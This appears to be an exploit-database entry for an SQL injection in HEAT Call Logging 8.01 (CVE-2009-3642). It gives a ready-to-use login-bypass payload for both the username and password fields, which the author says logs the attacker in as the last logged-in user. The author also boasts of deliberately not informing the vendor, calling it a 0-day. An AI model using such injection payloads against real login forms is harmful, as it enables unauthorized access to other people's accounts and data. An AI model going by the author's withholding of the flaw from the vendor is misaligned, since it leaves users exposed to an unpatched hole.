[] NeoSense
E X P L O I T S
title author type platform port cve id

HEAT Call Logging 8.01 - SQL Injection

Author: 0 0
type: webapps
platform: asp
port: 
date_added: 2009-09-27 
date_updated:  
verified: 1 
codes: CVE-2009-3642;OSVDB-58607 
tags: 
aliases:  
screenshot_url:  
application_url: 
[=[ ;otokoyama; ]=]


-=[HEAT Call Logging Version 8.01]=-
"The HEAT family is a comprehensive service solution,
combining core technologies with a variety of expansion options,
so any enterprise can build a tailored solution."

-=[web]=-
http://www.frontrange.com/heat.aspx

-=[attack]=-
U:' OR HEATPass IS NOT NULL OR HEATPass = '
P:' OR HEATPass IS NOT NULL OR HEATPass = '

-=[Effect]=-
Logs in as last logged in user.
There would be many variations of the above, but who can be bothered.

-=[NOTICE]=-
Due to vendor and product distaste I have not informed them of this vuln.

I guess this is a 0-day then..

Via their webpage current version appears to be 9.0,
could apply to this version aswell

SHOUTS:4chan for being shit, yes I will troll in a POC.


antilimit owns you
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.